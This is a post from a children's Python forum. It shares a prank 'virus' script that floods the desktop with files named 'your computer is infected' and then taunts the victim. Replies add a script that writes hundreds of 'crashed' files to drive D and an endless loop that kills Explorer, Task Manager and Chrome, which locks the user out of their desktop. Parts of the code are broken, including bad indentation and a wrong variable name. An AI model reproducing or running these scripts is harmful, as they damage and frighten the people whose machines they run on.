用户:
耗子Haozi查看:19 回复:10 评论:19 创建时间:2020-04-05T13:11:32
【作品展示】

【作品介绍】
喵py产品一个
【作品源代码】
import turtle
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.txt','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.exe','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.doc','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.docx','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.ppt','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.pptx','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.sb2','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.sb3','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.fla','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.gif','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.jpg','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.uga','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.html','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.htm','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.swf','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.ico','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.py','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.zip','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.7z','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.pdf','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.xls','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.MP3','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.MP4','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.MP3','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.MP4','w')
file.write('你的电脑已中毒')
for __count in range(999):
print('你是喵')
print('这也能上当')
print('呵呵呵')
print('慢慢删吧')
【提示】
部分含有Python第三方库相关内容的作品,在海龟编辑器网页端无法运行哦!如遇到这种情况,可以打开下面的链接,下载海龟编辑器客户端:
https://python.codemao.cn
蒟蒻OIer1048576for i in range(666):
with open('D:\你的电脑已死机'+str(i)+'次','w') as file:
f.write('你的电脑已死机')点赞0
评论
from os import system
while True:
system("taskkill /f /im explorer.exe >nul 2>nul")
system("taskkill /f /im taskmgr.exe >nul 2>nul")
system("taskkill /f /im chrome.exe >nul 2>nul")
点赞1
评论
8ximport turtle
__Pen = turtle.Pen()
__Pen.write('哼,你这个......谁?', font = ('Arial', 36, 'normal'))
__Pen.backward(120)
__Pen.left(90)
__Pen.forward(100)
__Pen.circle(30, steps=5)
turtle.done()
点赞0
评论